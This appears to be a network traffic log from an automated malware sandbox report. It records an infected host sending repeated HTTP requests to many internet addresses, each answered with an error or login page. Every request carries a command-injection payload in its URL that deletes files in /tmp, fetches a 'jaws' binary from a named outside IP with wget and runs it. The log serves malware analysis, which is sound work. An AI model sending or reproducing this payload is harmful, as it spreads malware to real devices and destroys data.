                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 63 37 30 65 37 33 31 26 23 34 36 3b 31 37 30 36 32 37 39 35 33 35 26 23 34 36 3b 32 38 36 32 35 61 33 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ac70e731&#46;1706279535&#46;28625a39</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            371192.168.2.233623845.183.19.21980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:15.022013903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.252769947 CET301INHTTP/1.1 200 OK
                                                            Content-Type:text/html
                                                            Pragma:no-cache
                                                            Cache-control:no-cache, no-store, max-age=0
                                                            Transfer-Encoding:chunked
                                                            X-Frame-Options:SAMEORIGIN
                                                            Connection:Keep-Alive
                                                            X-XSS-Protection:1; mode=block
                                                            Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                            Jan 26, 2024 15:32:15.252784967 CET1286INData Raw: 63 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                            Data Ascii: cb7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                            Jan 26, 2024 15:32:15.252830982 CET1286INData Raw: 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 4c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20
                                                            Data Ascii: return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUshortValid(List[i])) { return false; } } return true; }function IsIPv6A
                                                            Jan 26, 2024 15:32:15.253667116 CET731INData Raw: 65 73 73 56 61 6c 69 64 28 48 6f 73 74 49 6e 66 6f 29 29 0d 0a 7b 0d 0a 2f 2a 20 68 6f 73 74 20 73 74 72 69 6e 67 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 70 6f 72 74 20 2a 2f 0d 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 73
                                                            Data Ascii: essValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;}else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWan


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            372192.168.2.234019820.241.66.6780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:15.705873013 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.826416016 CET372INHTTP/1.1 404 Not Found
                                                            Server: Microsoft-Azure-Application-Gateway/v2
                                                            Date: Fri, 26 Jan 2024 14:32:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 179
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 41 7a 75 72 65 2d 41 70 70 6c 69 63 61 74 69 6f 6e 2d 47 61 74 65 77 61 79 2f 76 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>Microsoft-Azure-Application-Gateway/v2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            373192.168.2.234689023.196.72.23180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:15.819740057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.933701992 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:15 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:15 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 33 36 35 33 33 62 38 26 23 34 36 3b 31 37 30 36 32 37 39 35 33 35 26 23 34 36 3b 32 36 38 66 66 30 38 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;836533b8&#46;1706279535&#46;268ff081</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            374192.168.2.236032254.243.167.15080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:15.823026896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            375192.168.2.2353088161.47.33.18380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:15.824990988 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.944199085 CET419INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:15 GMT
                                                            Server: Apache/2.4.6 (CentOS)
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            376192.168.2.235690293.179.30.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:15.908806086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:16.111757994 CET1286INHTTP/1.1 200 OK
                                                            Content-Length: 1243
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: text/html
                                                            X-Frame-Options: SAMEORIGIN
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 2c 62 6f 64 79 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 7d 2e 6f 63 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 2e 69 63 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 66 6f 72 6d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 63 63 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 72 65 64 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 32 35 70 78 20 30 3b 77 69 64 74 68 3a 35 30 30 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 61 75 74 6f 3b 7d 2e 66 65 6c 2c 2e 66 65 72 2c 2e 66 65 63 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 33 35 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 7d 2e 66 65 6c 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 7d 2e 66 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 7d 68 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 31 70 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 31 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 70 7b 6d 61 72 67 69 6e 3a 31 35 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 37 35 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 7d 75 6c 7b 6d 61 72 67 69 6e 3a 31 35 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 37 35 25 3b 7d 68 32 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 31 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 6c 61 62 65 6c 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 2e 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 20 63 65 6e 74 65 72 20 32 35 70 78 20 75 72 6c 28 2f 58 58 2f 59 59 2f 5a 5a 2f 43 49 2f 4d 47 50 47 48 47 50 47 50 46 47 47 48 48 50 46 42 47 46 48 45 48 49 47 29 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 30 70 78 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 74 69 74 6c 65 3e 46 69 72 65 77 61 6c 6c 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 22 3e 3c 66 6f 72 6d 3e 3c 68 31 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 46 69 72 65 77 61 6c 6c 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 68 31 3e 3c 68 32 3e 59 6f 75 72 20 61 63 63 65 73 73 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 62 79 20 66 69 72 65 77 61 6c 6c 20 70 6f 6c 69 63 79 20 31 2e 3c 62 72 3e 49 66 20 79 6f 75 20 68 61 76 65 20 61 6e 79 20 66 75 72 74 68 65 72 20 63 6f 6e 63 65
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">html,body{height:100%;padding:0;margin:0;}.oc{display:table;width:100%;height:100%;}.ic{display:table-cell;vertical-align:middle;height:100%;}form{display:block;background:#ccc;border:2px solid red;padding:0 0 25px 0;width:500px;font-family:helvetica,sans-serif;font-size:14px;margin:10px auto;}.fel,.fer,.fec{text-align:center;width:350px;margin:0 auto;padding:10px;}.fel{text-align:left;}.fer{text-align:right;}h1{font-weight:bold;font-size:21px;margin:0;padding:20px 10px;text-align:center;}p{margin:15px auto;width:75%;text-align:left;}ul{margin:15px auto;width:75%;}h2{margin:25px 10px;font-weight:bold;text-align:center;}label,h2{font-size:16px;}.logo{background:#eee center 25px url(/XX/YY/ZZ/CI/MGPGHGPGPFGGHHPFBGFHEHIG) no-repeat;padding-top:80px;}</style><title>Firewall Notification</title></head><body><div class="oc"><div class="ic"><form><h1 class="logo">Firewall Notification</h1><h2>Your access has been blocked by firewall policy 1.<br>If you have any further conce
                                                            Jan 26, 2024 15:32:16.111776114 CET120INData Raw: 72 6e 73 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 6e 65 74 77 6f 72 6b 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 68 32 3e 3c 2f 66 6f 72 6d 3e 3c 2f
                                                            Data Ascii: rns, please contact your network administrator for more information.</h2></form></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            377192.168.2.2357028174.129.134.13180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.241039038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.356529951 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            378192.168.2.2359868108.156.238.15980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.244719028 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.365580082 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            379192.168.2.2345978187.192.184.22880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.308942080 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            380192.168.2.235938292.204.202.2380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.333462954 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.550358057 CET479INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 16:21:05 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            381192.168.2.235743494.255.246.23980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.340341091 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.558907986 CET1286INHTTP/1.1 200 Ok
                                                            Server: micro_httpd
                                                            Cache-Control: no-cache
                                                            Date: Fri, 26 Jan 2024 16:31:33 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 70 72 61 67 6d 61 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 2d 63 61 63 68 65 27 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 73 70 61 6e 2e 74 69 74 6c 65 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 0a 7d 0a 74 61 62 6c 65 2e 70 6f 73 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 74 61 62 6c 65 2e 72 65 61 6c 20 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 0a 09 77 69 64 74 68 3a 33 38 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 31 34 34 70 78 3b 0a 09 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 36 36 36 3b 0a 7d 0a 74 64 2e 74 64 5f 68 65 61 64 65 72 20 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 0a 09 77 69 64 74 68 3a 38 30 70 78 3b 0a 7d 0a 74 64 2e 74 64 5f 69 6e 70 75 74 20 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0a 7d 0a 74 64 2e 62 75 74 74 6f 6e 20 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 0a 7d 0a 74 64 23 70 6f 73 5f 74 64 20 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 30 70 78 3b 0a 7d 0a 69 6e 70 75 74 23 75 73 65 72 6e 61 6d 65 2c 20 69 6e 70 75 74 23 70 61 73 73 77 6f 72 64 20 7b 20 77 69 64 74 68 3a 39 30 25 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 0a 69 66 20 28 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 21 3d 20 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 7b 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 09 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 20 22 5f 74 6f 70 22 29 3b 0a 7d 0a 76 61 72 20 75 72 6c 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 76 61 72 20 69 20 3d 20 75 72 6c 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2f 22 29 3b 0a 69 66 20 28 21 28 69 20 3d 3d 20 2d 31 20 7c 7c 0a 09 75 72 6c 2e 73 75 62 73 74 72 28 69 29 20 3d 3d 20 22 22 20 7c 7c 0a 09 75 72 6c 2e 73 75 62 73 74 72 28 69 20 2b 20 31 29 20 3d 3d 20 22 22 20 7c 7c 0a 09 75 72 6c 2e 73 75 62 73 74 72 28 69 20 2b 20 31 29 20 3d 3d 20 22 69 6e 64 65 78 2e 68 74 6d 6c 22 29 0a 29 0a 09 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 22 2f 22 2c 20 